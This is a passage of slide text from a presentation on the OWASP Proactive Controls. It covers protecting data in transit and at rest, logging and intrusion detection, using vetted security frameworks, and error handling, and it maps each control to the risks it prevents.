  • 39. C7 Controls: Data in transit Data in transit: HTTPS • Confidentiality: Spy cannot view your data • Integrity: Spy cannot change your data • Authenticity: Server you visit is the right one 39 MITM Protection - HSTS • HTTPS + Strict Transport Security Header
  • 40. C7 Controls: Data at rest 1. Algorithm •AES (Advanced Encryption Standard ) 2. Secure key management 3. Adequate access controls and auditing 40
  • 41. 41 Proactive Control Risks prevented C7: Protect Data A6. Sensitive Data Exposure
  • 42. New Website 42 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C2 Parametrize Queries
  • 43. C8. Implement Logging and Intrusion Detection 43
  • 44. 44 Proactive Control Risks prevented C8.Logging and Intrusion Detection All OWASP Top 10 Risks!
  • 45. C9. Leverage Security Frameworks and Libraries 45
  • 46. C9: Examples • Framework with CSRF protection • Framework with XSS protection • ORM - SQL injection prevention • Vetted Cryptographic algorithm 46
  • 47. C9: Best Practices  Use trusted sources  Low-coupling (Low-coupling == reduced attack surface)  Update regularly / replace 47
  • 48. 48 Proactive Control Risks prevented C9. Leverage Security All OWASP Top 10 Risks!
  • 49. C10. Error and Exception Handling 49
  • 50. C10: Best Practices  Centralised error handling  Verbose enough to explain the issue  Don’t leak critical information 50
  • 51. 51 Proactive Control Risks prevented C10. Error and Exception Handling All OWASP Top 10 Risks!
  • 52. New Website 52 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C10 Error Handling C8 Logging C2 Parametrize Queries C9 Leverage security
  • 53. It’s a Start To Secure Software by Default! 53
  • 54. Reference OWASP Proactive Controls Project: https://www.owasp.org/index.php/OWASP _Proactive_Controls 54